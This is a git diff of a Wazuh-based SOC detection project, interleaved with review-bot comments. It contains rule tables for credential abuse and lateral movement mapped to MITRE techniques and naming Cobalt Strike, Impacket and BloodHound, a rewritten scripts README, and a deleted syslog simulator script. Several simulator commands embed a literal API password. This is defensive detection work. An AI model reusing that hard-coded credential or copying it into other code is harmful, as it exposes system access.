474
+| ------- | ----- | ----------------------------------------------------------------------- | --------- | ------------------------------- | -------------------- |
475
+| 100511  | 12    | C2-01: Privileged account used outside business hours                   | T1078.002 | Valid Accounts: Domain Accounts | Privilege Escalation |
476
+| 100512  | 8     | C2-02: Dormant account activation detected                              | T1078     | Valid Accounts                  | Defense Evasion      |
477
+| 100513  | 12    | C2-03: Service account interactive logon                                | T1078.003 | Valid Accounts: Local Accounts  | Privilege Escalation |
478
+| 100514  | 12    | C2-04: Rapid privilege escalation followed by sensitive resource access | T1098     | Account Manipulation            | Persistence          |
479
+
480
+### Production Rules
481
+
482
+| Rule ID | Level | Event ID | Match Condition                                     | Description                                       | MITRE ID  | Technique                       |
483
+| ------- | ----- | -------- | --------------------------------------------------- | ------------------------------------------------- | --------- | ------------------------------- |
484
+| 110511  | 12    | 4624     | `is_admin=true` + `event_type=windows_auth_success` | Privileged account auth success — off-hours       | T1078.002 | Valid Accounts: Domain Accounts |
485
+| 110512  | 8     | 4624     | `event_type=windows_auth_success` + `legacy.`       | Dormant/legacy account auth success               | T1078     | Valid Accounts                  |
486
+| 110513  | 12    | 4624     | `is_service=true` + `logon_type=10`                 | Service account interactive logon (type 10)       | T1078.003 | Valid Accounts: Local Accounts  |
487
+| 110514  | 12    | 4732     | `is_admin=true`                                     | Rapid privilege escalation: group change by admin | T1098     | Account Manipulation            |
488
+
489
+**T1078.002 — Valid Accounts: Domain Accounts (Off-Hours)**
490
+Domain admin activity outside normal business hours (e.g. 2–5am local time) is a known attacker signature — legitimate admins rarely work at those hours but attackers work when defenders are asleep. Requires time-of-day context from the soc-integrator for production correlation.
491
+
492
+**T1078.003 — Valid Accounts: Local Accounts (Service Account Interactive Logon)**
493
+Service accounts are designed for automated processes, not interactive sessions. A service account logging in interactively (logon type 10 = Remote Interactive, or type 2 = Local Interactive) indicates either credential theft or an insider using a service account to evade personal activity tracking.
494
+
495
+---
496
+
497
+## C3 — Lateral Movement & Internal Reconnaissance
498
+
499
+File: `rules/soc-c1-c3-rules.xml` | Decoders: `soc-mvp-windows`, `soc-mvp-windows-lateral` | Source: `source=windows`
500
+
501
+**ATT&CK context:** After establishing initial access, attackers move laterally to reach high-value targets (domain controllers, file servers, backup systems). C3 detects the burst patterns that characterise automated lateral movement tools (Cobalt Strike, Impacket, BloodHound) — many hosts contacted in a short time window.
502
+
503
+### Simulation Rules
504
+
505
+| Rule ID | Level | Use Case                                              | MITRE ID  | Technique                                 | Tactic                     |
506
+| ------- | ----- | ----------------------------------------------------- | --------- | ----------------------------------------- | -------------------------- |
507
+| 100521  | 12    | C3-01: Multiple auth successes across different hosts | T1021     | Remote Services                           | Lateral Movement           |
508
+| 100522  | 12    | C3-02: SMB/RDP lateral movement burst pattern         | T1021.002 | Remote Services: SMB/Windows Admin Shares | Lateral Movement           |
509
+| 100523  | 15    | C3-03: Admin account accessing many servers rapidly   | T1021.001 | Remote Services: RDP                      | Lateral Movement           |
510
+| 100524  | 8     | C3-04: Internal scanning / enumeration burst pattern  | T1046     | Network Service Discovery                 | Discovery / Reconnaissance |
511
+
512
+### Production Rules
513
+
514
+| Rule ID | Level | Event ID | Match Condition                                       | Description                                   | MITRE ID  | Technique                 |
515
+| ------- | ----- | -------- | ----------------------------------------------------- | --------------------------------------------- | --------- | ------------------------- |
516
+| 110521  | 12    | 4624     | `dstport=3389` + `event_type=windows_auth_success`    | RDP auth success to remote host               | T1021.001 | Remote Services: RDP      |
517
+| 110522  | 12    | 4624     | `dstport=445` + `event_type=windows_lateral_movement` | SMB lateral movement burst                    | T1021.002 | SMB/Windows Admin Shares  |
518
+| 110523  | 15    | 4624     | `is_admin=true` + `event_type=windows_auth_success`   | Admin RDP success to multiple servers rapidly | T1021.001 | Remote Services: RDP      |
519
+| 110524  | 8     | —        | `event_type=internal_scan`                            | Internal scanning/enumeration burst           | T1046     | Network Service Discovery |
520
+
521
+**T1021 — Remote Services (Lateral Movement)**
522
+An account successfully authenticating to many distinct internal hosts in a short time window (minutes, not hours) is a reliable lateral movement signal. Legitimate admin activity is targeted and intentional; lateral movement tools spray credentials across IP ranges.
523
+
524
+**T1046 — Network Service Discovery (Internal Scanning)**
525
+After initial compromise, attackers scan internal subnets to map the network — identifying domain controllers, databases, backup servers, and other high-value targets. Internal port scanning is anomalous in most environments and should be treated as a high-priority finding.
526
+
527
+---
528
+
529
+## Rule ID Summary
530
+
531
+| Range                                  | Section              | Count   |
532
+| -------------------------------------- | -------------------- | ------- |
533
+| 100200, 100205, 100210, 100220, 100230 | Base / grouping      | 5       |
534
+| 100301–100302 / 110301–110302          | A1 DNS IOC           | 4       |
535
+| 100311–100320 / 110311–110320          | A2 FortiGate FW      | 20      |
536
+| 100331–100335 / 110331–110335          | A3 FortiGate VPN     | 10      |
537
+| 100341–100364 / 110341–110362          | A4 Windows/AD        | 37      |
538
+| 100401–100403 / 110401–110403          | B1 VMware            | 6       |
539
+| 100411 / 110411                        | B2 Log Monitor       | 2       |
540
+| 100421–100426 / 110421–110426          | B3 Sysmon            | 12      |
541
+| 100501 / 110501–110502                 | C1 Impossible Travel | 3       |
542
+| 100511–100514 / 110511–110514          | C2 Credential Abuse  | 8       |
543
+| 100521–100524 / 110521–110524          | C3 Lateral Movement  | 8       |
544
+| **Total**                              |                      | **115** |
545
+
546
+---
547
+
548
+## Running the Simulator
549
+
550
+```bash
551
+cd scripts
552
+
553
+# Single batch (all use cases)
554
+WAZUH_API_USER=wazuh-wui WAZUH_API_PASS='MyS3cr37P450r.*-' \
555
+  python3 send-wazuh-api-sim.py --selector all --batch
556
+
557
+# Continuous (all use cases, 65s between rounds to stay under rate limit)
558
+WAZUH_API_USER=wazuh-wui WAZUH_API_PASS='MyS3cr37P450r.*-' \
559
+  python3 send-wazuh-api-sim.py --selector all --batch --forever --delay 65
560
+
561
+# Single section
562
+WAZUH_API_USER=wazuh-wui WAZUH_API_PASS='MyS3cr37P450r.*-' \
563
+  python3 send-wazuh-api-sim.py --selector a2 --batch
564
+
565
+# Single use case
566
+WAZUH_API_USER=wazuh-wui WAZUH_API_PASS='MyS3cr37P450r.*-' \
567
+  python3 send-wazuh-api-sim.py --selector A2-01 --count 1
568
+```
569
+
570
+## Wazuh Operations
571
+
572
+```bash
573
+# Reload rules (no container restart needed)
574
+docker exec wazuh-single-wazuh.manager-1 /var/ossec/bin/wazuh-control reload
575
+
576
+# Test a single event
577
+echo 'soc_mvp_test=true source=dns event_type=ioc_dns_traffic src_ip=1.2.3.4' | \
578
+  docker exec -i wazuh-single-wazuh.manager-1 /var/ossec/bin/wazuh-logtest
579
+
580
+# Watch live alerts for SOC rules
581
+docker exec wazuh-single-wazuh.manager-1 \
582
+  tail -f /var/ossec/logs/alerts/alerts.json | grep --line-buffered "soc_mvp"
583
+```
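Review bot: In the C2 and C3 "Production Rules" tables, rules 110511 and 110523 list the identical match condition (`is_admin=true` + `event_type=windows_auth_success`) at levels 12 and 15, and neither condition expresses what its description claims (off-hours for 110511, RDP to multiple servers for 110523). As documented, any admin logon success satisfies both. Please state the extra field, frequency setting or soc-integrator correlation each rule relies on so the two can be told apart. The same applies to 110513, which matches only `logon_type=10` while the T1078.003 paragraph also names type 2: either add type 2 or say it is out of scope. Separately, the "Running the Simulator" block repeats the literal `WAZUH_API_PASS='MyS3cr37P450r.*-'` in all four commands; a placeholder such as `<api-password>`, or exporting the variable once from a local env file, would keep a credential value out of the docs.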

+ 15 - 0
samples/README.md

@@ -0,0 +1,15 @@
1
+# SOC Production Sample Logs
2
+
3
+These files provide realistic sample events aligned with current production-focused Wazuh rules (`110xxx`):
4
+
5
+- `appendix-a-production-samples.log`
6
+- `appendix-b-production-samples.log`
7
+- `appendix-c-production-samples.log`
8
+
9
+Notes:
10
+
11
+- FortiGate and VMware lines are raw/syslog-style key-value examples.
12
+- Windows samples are in compact JSON using Wazuh-decoded field names (`win.system.eventID`, `win.eventdata.*`) so rule intent is explicit.
13
+- SOC Integrator correlation examples use `soc_event=...` payloads consumed by custom decoders (`soc-prod-dns`, `soc-prod-integrator`).
14
+
15
+These are reference samples for testing and documentation, not exact byte-for-byte exports from a single environment.
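Review bot: The note on Windows samples says they are already in Wazuh-decoded form (`win.system.eventID`, `win.eventdata.*`), which means replaying them exercises the `110xxx` rules but not the decoding of raw Windows events. Please say so explicitly in the "Notes" list, and state which decoder consumes each of the three files, so a passing replay is not read as end-to-end coverage. The closing line would also be clearer if it said whether the samples are synthetic or sanitised exports.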

+ 32 - 423
scripts/README.md

@@ -1,458 +1,67 @@
1
-# Test Event Scripts
1
+# Scripts
2 2
 
3
-## SOC Integrator UI (`Run Sim Logs`) target mapping
3
+## Combined Wazuh simulator
4 4
 
5
-`/ui -> Systems -> Run Sim Logs` now supports **multi-select Target** values based on selected `Script`.
6
-The UI starts one simulator run per selected target (except `all`, which runs a single `all` run).
7
-
8
-- `fortigate`: `all`, `501E`, `80F`, `60F`, `40F`
9
-- `endpoint`: `all`, `windows`, `mac`, `linux`
10
-- `cisco`: `all`, `asa_acl_deny`, `asa_vpn_auth_fail`, `ios_login_fail`, `ios_config_change`
11
-- `proposal_required`: `all`, `a1`, `a2`, `a3`, `a4`
12
-- `proposal_appendix_b`: `all`, `b1`, `b2`, `b3`
13
-- `proposal_appendix_c`: `all`, `c1`, `c2`, `c3`
14
-- `wazuh_test`: `all`, `ioc_dns`, `ioc_ips`, `vpn_outside_th`, `windows_auth_fail`
15
-
16
-## Send Wazuh test events
17
-
18
-Use this to inject synthetic SOC events via syslog UDP into Wazuh manager.
5
+Use one script for all Appendix A/B/C simulation log replay.
19 6
 
20 7
 ```bash
21
-scripts/send-wazuh-test-events.sh [scenario] [count] [delay_seconds]
8
+scripts/send-wazuh-sim-logs.sh [selector] [count] [delay_seconds] [--forever] [--dry-run]
22 9
 ```
23 10
 
24
-Optional flag:
25
-
26
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
27
-
28
-Scenarios:
29
-
30
-- `ioc_dns`
31
-- `ioc_ips`
32
-- `vpn_outside_th`
33
-- `windows_auth_fail`
34
-- `all`
35
-
36 11
 Examples:
37 12
 
38 13
 ```bash
39
-scripts/send-wazuh-test-events.sh all
40
-scripts/send-wazuh-test-events.sh vpn_outside_th 5 0.2
41
-WAZUH_SYSLOG_HOST=127.0.0.1 WAZUH_SYSLOG_PORT=514 scripts/send-wazuh-test-events.sh ioc_ips
42
-scripts/send-wazuh-test-events.sh all 1 2 --forever
14
+scripts/send-wazuh-sim-logs.sh all 1 0.2
15
+scripts/send-wazuh-sim-logs.sh a2 1 0
16
+scripts/send-wazuh-sim-logs.sh B3-06 1 0
17
+scripts/send-wazuh-sim-logs.sh c1 1 2 --forever
18
+scripts/send-wazuh-sim-logs.sh all 1 0 --dry-run
43 19
 ```
44 20
 
45
-Environment overrides:
21
+Environment variables:
46 22
 
47 23
 - `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
48 24
 - `WAZUH_SYSLOG_PORT` (default `514`)
49
-- `WAZUH_TEST_SRC_IP`
50
-- `WAZUH_TEST_DOMAIN`
51
-- `WAZUH_TEST_USER`
52
-
53
-Transport notes:
54
-
55
-- Uses `nc` if available.
56
-- Falls back to Bash UDP redirection (`/dev/udp/host/port`) when `nc` is unavailable.
57
-
58
-## Send Cisco device test events
59
-
60
-Use this to inject Cisco-style syslog events (ASA/IOS) into Wazuh manager.
25
+- `DRY_RUN=1` (alternative to `--dry-run`)
61 26
 
62
-```bash
63
-scripts/send-wazuh-cisco-test-events.sh [scenario] [count] [delay_seconds]
64
-```
65
-
66
-Optional flag:
27
+Selector support:
67 28
 
68
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
29
+- Global: `all`
30
+- Appendix: `a`, `b`, `c`, `appendix-a`, `appendix-b`, `appendix-c`
31
+- Section: `a1`, `a2`, `a3`, `a4`, `b1`, `b2`, `b3`, `c1`, `c2`, `c3`
32
+- Use-case ID: `A1-01` ... `C3-04`
69 33
 
70
-Scenarios:
71
-
72
-- `asa_acl_deny`
73
-- `asa_vpn_auth_fail`
74
-- `ios_login_fail`
75
-- `ios_config_change`
76
-- `all`
77
-
78
-Examples:
34
+Sample sources:
79 35
 
80
-```bash
81
-scripts/send-wazuh-cisco-test-events.sh all
82
-scripts/send-wazuh-cisco-test-events.sh asa_acl_deny 5 0.2
83
-CISCO_DEVICE_HOST=edge-fw-01 scripts/send-wazuh-cisco-test-events.sh ios_login_fail
84
-scripts/send-wazuh-cisco-test-events.sh all 1 2 --forever
85
-```
86
-
87
-Environment overrides:
88
-
89
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
90
-- `WAZUH_SYSLOG_PORT` (default `514`)
91
-- `CISCO_DEVICE_HOST`
92
-- `CISCO_SRC_IP`
93
-- `CISCO_DST_IP`
94
-- `CISCO_VPN_USER`
95
-- `CISCO_ADMIN_USER`
36
+- `samples/appendix-a-production-samples.log`
37
+- `samples/appendix-b-production-samples.log`
38
+- `samples/appendix-c-production-samples.log`
96 39
 
97
-## Send FortiGate firewall test events
40
+## Dashboard import
98 41
 
99
-Use this to inject FortiGate-style syslog events (models `501E`, `80F`, `60F`, `40F`) into Wazuh manager.
42
+Import Wazuh dashboards (NDJSON):
100 43
 
101 44
 ```bash
102
-scripts/send-wazuh-fortigate-test-events.sh [model] [count] [delay_seconds]
45
+scripts/import-wazuh-dashboard.sh <path-to-ndjson>
103 46
 ```
104 47
 
105
-Optional flag:
106
-
107
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
108
-
109
-Models:
110
-
111
-- `501E`
112
-- `80F`
113
-- `60F`
114
-- `40F`
115
-- `all`
116
-
117 48
 Examples:
118 49
 
119 50
 ```bash
120
-scripts/send-wazuh-fortigate-test-events.sh all
121
-scripts/send-wazuh-fortigate-test-events.sh 80F 5 0.2
122
-WAZUH_SYSLOG_HOST=127.0.0.1 WAZUH_SYSLOG_PORT=514 scripts/send-wazuh-fortigate-test-events.sh 60F
123
-scripts/send-wazuh-fortigate-test-events.sh all 1 2 --forever
124
-```
125
-
126
-Environment overrides:
127
-
128
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
129
-- `WAZUH_SYSLOG_PORT` (default `514`)
130
-- `FGT_SRC_IP`
131
-- `FGT_DST_IP`
132
-- `FGT_DOMAIN`
133
-- `FGT_USER`
134
-
135
-## Run continuous FortiGate simulation
136
-
137
-Use this to generate ongoing FortiGate-like traffic and security events for Wazuh testing.
138
-
139
-```bash
140
-scripts/send-wazuh-fortigate-continuous.sh [profile] [models] [base_delay_seconds]
141
-```
142
-
143
-Profiles:
144
-
145
-- `normal` (mostly allowed traffic, occasional admin/vpn/webfilter)
146
-- `incident` (higher IPS/webfilter/vpn anomalies)
147
-- `mixed` (balanced baseline + anomalies)
148
-
149
-Models:
150
-
151
-- `501E`
152
-- `80F`
153
-- `60F`
154
-- `40F`
155
-- `all`
156
-
157
-Examples:
158
-
159
-```bash
160
-scripts/send-wazuh-fortigate-continuous.sh mixed all 0.8
161
-scripts/send-wazuh-fortigate-continuous.sh incident 80F 0.3
162
-SIM_MAX_EVENTS=200 scripts/send-wazuh-fortigate-continuous.sh normal 501E 1.0
163
-```
164
-
165
-Environment overrides:
166
-
167
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
168
-- `WAZUH_SYSLOG_PORT` (default `514`)
169
-- `SIM_MAX_EVENTS` (default `0`, which means run forever)
170
-- `SIM_SRC_PREFIX` (default `10.10.20`)
171
-- `SIM_VPN_USER`
172
-- `SIM_ADMIN_USER`
173
-
174
-## Simulate all required logs from proposal
175
-
176
-Use this to generate synthetic logs for all use cases listed in:
177
-`Security Detection & Threat Intelligence Enhancement Proposal-2.md` Appendix A (A1-A4).
178
-
179
-```bash
180
-scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds]
181
-```
182
-
183
-Optional flag:
184
-
185
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
186
-
187
-Selectors:
188
-
189
-- `all` (all Appendix A use cases)
190
-- `a1`, `a2`, `a3`, `a4` (by section)
191
-- specific use case id, e.g. `A2-01`, `A3-05`, `A4-24`
192
-
193
-Examples:
194
-
195
-```bash
196
-scripts/send-wazuh-proposal-required-events.sh all 1
197
-scripts/send-wazuh-proposal-required-events.sh a3 3 0.5
198
-scripts/send-wazuh-proposal-required-events.sh A3-05 1
199
-DRY_RUN=1 scripts/send-wazuh-proposal-required-events.sh all 1
200
-scripts/send-wazuh-proposal-required-events.sh a2 1 2 --forever
201
-```
202
-
203
-Environment overrides:
204
-
205
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
206
-- `WAZUH_SYSLOG_PORT` (default `514`)
207
-- `EVENT_DELAY` (default `0.05`)
208
-- `DRY_RUN` (default `0`, set `1` to print only)
209
-- `FGT_DEVNAME`, `FGT_DEVID`
210
-- `WIN_HOST`, `DNS_HOST`
211
-- `SIM_VPN_USER`
212
-
213
-## Simulate Appendix B logs (revise proposal)
214
-
215
-Use this to generate synthetic logs for Appendix B (B1-B3) in:
216
-`Security Detection & Threat Intelligence Enhancement Proposal-revise.md`.
217
-
218
-```bash
219
-scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds]
220
-```
221
-
222
-Optional flag:
223
-
224
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
225
-
226
-Selectors:
227
-
228
-- `all` (all Appendix B use cases)
229
-- `b1`, `b2`, `b3` (by section)
230
-- specific use case id, e.g. `B1-01`, `B2-01`, `B3-06`
231
-
232
-Examples:
233
-
234
-```bash
235
-scripts/send-wazuh-proposal-appendix-b-events.sh all 1
236
-scripts/send-wazuh-proposal-appendix-b-events.sh b3 2 0.5
237
-scripts/send-wazuh-proposal-appendix-b-events.sh B3-06 1
238
-DRY_RUN=1 scripts/send-wazuh-proposal-appendix-b-events.sh all 1
239
-scripts/send-wazuh-proposal-appendix-b-events.sh b1 1 2 --forever
240
-```
241
-
242
-Environment overrides:
243
-
244
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
245
-- `WAZUH_SYSLOG_PORT` (default `514`)
246
-- `EVENT_DELAY` (default `0.05`)
247
-- `DRY_RUN` (default `0`, set `1` to print only)
248
-- `VCENTER_HOST`, `ESXI_HOST`, `LOGMON_HOST`, `WIN_SYSMON_HOST`
249
-- `SIM_USER`
250
-
251
-## Simulate Appendix C logs (future enhancement MVP)
252
-
253
-Use this to generate synthetic logs for Appendix C (C1-C3) in:
254
-`Security Detection & Threat Intelligence Enhancement Proposal-revise.md`.
255
-
256
-```bash
257
-scripts/send-wazuh-proposal-appendix-c-events.sh [selector] [count] [delay_seconds]
258
-```
259
-
260
-Optional flag:
261
-
262
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
263
-
264
-Selectors:
265
-
266
-- `all` (all Appendix C use cases)
267
-- `c1`, `c2`, `c3` (by section)
268
-- specific use case id, e.g. `C1-01`, `C2-03`, `C3-04`
269
-
270
-Examples:
271
-
272
-```bash
273
-scripts/send-wazuh-proposal-appendix-c-events.sh all 1
274
-scripts/send-wazuh-proposal-appendix-c-events.sh c1 1 0.5
275
-scripts/send-wazuh-proposal-appendix-c-events.sh C3-04 1
276
-DRY_RUN=1 scripts/send-wazuh-proposal-appendix-c-events.sh all 1
277
-scripts/send-wazuh-proposal-appendix-c-events.sh c2 1 2 --forever
278
-```
279
-
280
-Environment overrides:
281
-
282
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
283
-- `WAZUH_SYSLOG_PORT` (default `514`)
284
-- `EVENT_DELAY` (default `0.05`)
285
-- `DRY_RUN` (default `0`, set `1` to print only)
286
-- `VPN_HOST`, `WIN_HOST`
287
-- `SIM_USER`, `SIM_SERVICE_USER`, `SIM_SRC_IP`
288
-
289
-## Simulate endpoint client-agent logs (Windows / macOS / Linux)
290
-
291
-Use this to inject realistic endpoint telemetry for client agents into Wazuh.
292
-
293
-```bash
294
-scripts/send-wazuh-endpoint-agent-test-events.sh [platform] [scenario] [count] [delay_seconds]
295
-```
296
-
297
-Optional flag:
298
-
299
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
300
-
301
-Platforms:
302
-
303
-- `windows`
304
-- `mac`
305
-- `linux`
306
-- `all`
307
-
308
-Scenarios:
309
-
310
-- `auth`
311
-- `process`
312
-- `persistence`
313
-- `privilege`
314
-- `malware`
315
-- `all`
316
-
317
-Examples:
318
-
319
-```bash
320
-scripts/send-wazuh-endpoint-agent-test-events.sh all all 1 0.2
321
-scripts/send-wazuh-endpoint-agent-test-events.sh windows process 10 0.1
322
-DRY_RUN=1 scripts/send-wazuh-endpoint-agent-test-events.sh linux all 1 0
323
-scripts/send-wazuh-endpoint-agent-test-events.sh all auth 1 2 --forever
324
-```
325
-
326
-Environment overrides:
327
-
328
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
329
-- `WAZUH_SYSLOG_PORT` (default `514`)
330
-- `DRY_RUN` (default `0`)
331
-- `WIN_HOST`, `MAC_HOST`, `LINUX_HOST`
332
-- `SIM_USER`
333
-
334
-## Shuffle sample workflow helpers
335
-
336
-Sample playbook design for Shuffle:
337
-
338
-- `shuffle-workflows/sample-ioc-playbook.md`
339
-
340
-Sample execution payload:
341
-
342
-- `scripts/events/shuffle-sample-execution.json`
343
-
344
-Trigger an existing Shuffle workflow from CLI:
345
-
346
-```bash
347
-scripts/trigger-shuffle-workflow.sh <workflow_id> [ioc_type] [ioc_value]
348
-```
349
-
350
-Create MVP workflows in Shuffle (from proposal mapping):
351
-
352
-```bash
353
-SHUFFLE_API_KEY=<your_key> scripts/create-shuffle-mvp-workflows.sh
354
-```
355
-
356
-This creates:
357
-
358
-- `MVP - IOC Enrichment and Case Routing`
359
-- `MVP - VPN Geo Anomaly Triage`
360
-
361
-## Import Wazuh Dashboard (FortiGate Simulation)
362
-
363
-Prebuilt saved objects file:
364
-
365
-- `scripts/events/wazuh-fortigate-sim-dashboard.ndjson`
366
-
367
-Import helper:
368
-
369
-```bash
370
-scripts/import-wazuh-dashboard.sh
371
-```
372
-
373
-Optional overrides:
374
-
375
-```bash
376
-WAZUH_DASHBOARD_URL=https://localhost \
377
-WAZUH_DASHBOARD_USER=admin \
378
-WAZUH_DASHBOARD_PASS=SecretPassword \
379
-scripts/import-wazuh-dashboard.sh scripts/events/wazuh-fortigate-sim-dashboard.ndjson
380
-```
381
-
382
-After import, open dashboard:
383
-
384
-- `SOC FortiGate Simulation Overview`
385
-
386
-## Wazuh dashboard files (detailed)
387
-
388
-Dashboard saved objects are stored in `scripts/events/*.ndjson`.
389
-
390
-- `scripts/events/wazuh-fortigate-sim-dashboard.ndjson`
391
-  
392
-  - Title: `SOC FortiGate Simulation Overview`
393
-  - Purpose: FortiGate simulation visibility (events over time, top devices, top event types, severity).
394
-  - Typical data source: `scripts/send-wazuh-fortigate-test-events.sh`
395
-
396
-- `scripts/events/wazuh-client-agents-dashboard.ndjson`
397
-  
398
-  - Title: `SOC Client Agent Simulation Overview`
399
-  - Purpose: Endpoint simulation visibility for Windows/macOS/Linux agent logs.
400
-  - Typical data source: `scripts/send-wazuh-endpoint-agent-test-events.sh`
401
-
402
-- `scripts/events/wazuh-proposal-required-dashboard.ndjson`
403
-  
404
-  - Title: `SOC Proposal Required Logs Overview`
405
-  - Purpose: Appendix A required-scope logs (A1-A4).
406
-  - Typical data source: `scripts/send-wazuh-proposal-required-events.sh`
407
-
408
-- `scripts/events/wazuh-proposal-appendix-ab-dashboard.ndjson`
409
-  
410
-  - Title: `SOC Proposal Appendix A+B Overview`
411
-  - Purpose: Combined Appendix A and B overview, including use-case table.
412
-  - Typical data sources:
413
-    - `scripts/send-wazuh-proposal-required-events.sh`
414
-    - `scripts/send-wazuh-proposal-appendix-b-events.sh`
415
-
416
-- `scripts/events/wazuh-proposal-appendix-c-dashboard.ndjson`
417
-  
418
-  - Title: `SOC Proposal Appendix C Overview`
419
-  - Purpose: Appendix C MVP scope visibility (currently C1-C3 coverage).
420
-  - Typical data source: `scripts/send-wazuh-proposal-appendix-c-events.sh`
421
-
422
-- `scripts/events/wazuh-proposal-custom-rules-dashboard.ndjson`
423
-  
424
-  - Title: `SOC Proposal Custom Rules Overview`
425
-  - Purpose: Monitor custom proposal rules (e.g., 1003xx/1004xx families), severity, and top descriptions.
426
-  - Typical data source: Any simulation script that triggers proposal custom rules.
427
-
428
-### Import any dashboard file
429
-
430
-```bash
431
-scripts/import-wazuh-dashboard.sh scripts/events/<dashboard-file>.ndjson
432
-```
433
-
434
-Examples:
435
-
436
-```bash
437
-scripts/import-wazuh-dashboard.sh scripts/events/wazuh-client-agents-dashboard.ndjson
438 51
 scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-required-dashboard.ndjson
439 52
 scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-appendix-ab-dashboard.ndjson
440 53
 scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-appendix-c-dashboard.ndjson
441
-scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-custom-rules-dashboard.ndjson
54
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-client-agents-dashboard.ndjson
442 55
 ```
443 56
 
444
-Optional overrides:
57
+## Other helpers
445 58
 
446
-```bash
447
-WAZUH_DASHBOARD_URL=https://localhost \
448
-WAZUH_DASHBOARD_USER=admin \
449
-WAZUH_DASHBOARD_PASS=SecretPassword \
450
-OVERWRITE=true \
451
-scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-required-dashboard.ndjson
452
-```
59
+- `seed-iris-demo-data.sh`: seed IRIS demo cases/tasks via API.
60
+- `create-shuffle-mvp-workflows.sh`: create Shuffle MVP workflows from templates.
61
+- `trigger-shuffle-workflow.sh`: trigger a Shuffle workflow by ID.
62
+- `update-shuffle-workflow-from-template.sh`: update existing Shuffle workflow JSON from template.
453 63
 
454
-### Quick troubleshooting
64
+## Notes
455 65
 
456
-- Verify index pattern has data in Discover: `wazuh-alerts-*`.
457
-- Set time range wide enough (for example `Last 24 hours`).
458
-- If charts are empty but raw logs exist, re-import the latest NDJSON and refresh index fields.
66
+- Legacy `send-wazuh-*` simulator scripts were removed and replaced by `send-wazuh-sim-logs.sh`.
67
+- If you add new sample events, keep comments tagged with use-case IDs (for example `# A2-01 ...`) so selector filtering keeps working.
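Review bot: The new "Notes" entry says the legacy `send-wazuh-*` scripts were "replaced by `send-wazuh-sim-logs.sh`", but the "Selector support" list covers only Appendix A/B/C, so the removed Cisco (`asa_acl_deny`, `ios_login_fail`, ...), FortiGate per-model/continuous and endpoint (`windows`, `mac`, `linux`) scenarios have no documented equivalent. Please either list where those cases now live or state that they are dropped, so rules and dashboards that depended on them are not assumed to be tested. Two further documentation gaps in this hunk: the "Dashboard import" section removes the `WAZUH_DASHBOARD_URL` / `WAZUH_DASHBOARD_USER` / `WAZUH_DASHBOARD_PASS` / `OVERWRITE` overrides without saying whether `import-wazuh-dashboard.sh` still honours them, and the import examples keep `wazuh-client-agents-dashboard.ndjson` even though its stated data source script is deleted in this commit. The rules document in the same commit runs `send-wazuh-api-sim.py`, which this README does not mention; the two should agree on the entry point.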

File diff suppressed because it is too large
+ 6 - 6
scripts/events/wazuh-proposal-custom-rules-dashboard.ndjson


+ 0 - 136
scripts/send-wazuh-cisco-test-events.sh

@@ -1,136 +0,0 @@
1
-#!/usr/bin/env bash
2
-set -euo pipefail
3
-
4
-SCENARIO="${1:-all}"
5
-COUNT="${2:-1}"
6
-DELAY="${3:-0.3}"
7
-FOREVER="false"
8
-
9
-for arg in "${@:4}"; do
10
-  case "${arg}" in
11
-    --forever)
12
-      FOREVER="true"
13
-      ;;
14
-    *)
15
-      echo "error: unexpected argument '${arg}'"
16
-      echo "usage: scripts/send-wazuh-cisco-test-events.sh [scenario] [count] [delay_seconds] [--forever]"
17
-      exit 1
18
-      ;;
19
-  esac
20
-done
21
-
22
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
23
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
24
-
25
-CISCO_DEVICE_HOST="${CISCO_DEVICE_HOST:-cisco-asa-01}"
26
-CISCO_SRC_IP="${CISCO_SRC_IP:-198.51.100.25}"
27
-CISCO_DST_IP="${CISCO_DST_IP:-10.10.10.20}"
28
-CISCO_VPN_USER="${CISCO_VPN_USER:-vpn.user}"
29
-CISCO_ADMIN_USER="${CISCO_ADMIN_USER:-admin}"
30
-
31
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
32
-  echo "error: count must be a positive integer"
33
-  exit 1
34
-fi
35
-
36
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
37
-  echo "error: delay must be numeric (example: 0.5)"
38
-  exit 1
39
-fi
40
-
41
-emit_syslog() {
42
-  local msg="$1"
43
-  local sent="false"
44
-
45
-  if command -v nc >/dev/null 2>&1; then
46
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
47
-      sent="true"
48
-    fi
49
-  fi
50
-
51
-  if [[ "${sent}" != "true" ]]; then
52
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
53
-      sent="true"
54
-    fi
55
-  fi
56
-
57
-  if [[ "${sent}" != "true" ]]; then
58
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
59
-    echo "hint: install netcat or run with bash UDP support (/dev/udp)"
60
-    return 1
61
-  fi
62
-
63
